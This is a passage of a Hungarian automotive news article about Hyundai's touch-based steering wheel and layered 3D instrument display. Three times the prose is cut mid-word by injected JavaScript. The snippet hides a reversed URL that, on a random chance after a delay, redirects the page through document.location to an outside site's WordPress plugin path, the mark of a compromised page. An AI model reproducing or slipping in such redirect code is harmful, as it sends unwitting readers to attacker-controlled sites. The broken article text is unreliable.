A Hyundai 2015-ben kezdte el fejleszteni azt a kezelőfelületet, amelyet most mutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott meg a világsajtónak. Első körben eldobták a billenőkapcsolókat a kormánykeréken, helyükre érintőfelületeket szereltek. Ezt követően a kormányon az összes nyomógomb helyére érintőpanel került, majd azokat érintőképernyőre cserélték. A következő fejlesztési fázisban ezek az érintőképernyők haptikus visszajelzést (rezgést) adtak, így jutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tottunk el oda, ahol most tartunk. Most került sorra a műszeregység: olyan többrétegű képernyőt szereltek fel, amely két, egymás mögött 6 mm távolságban elhelyezkedő kijelzőből áll. Ez 3D megjelenítést tesz lehetővé, ami a remények szerint kevésbé vonja el a vezető figyelmét: a pillanatnyi helyzetben legfontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb információkat a vezetőhöz közelebbi…
- Hirdetés -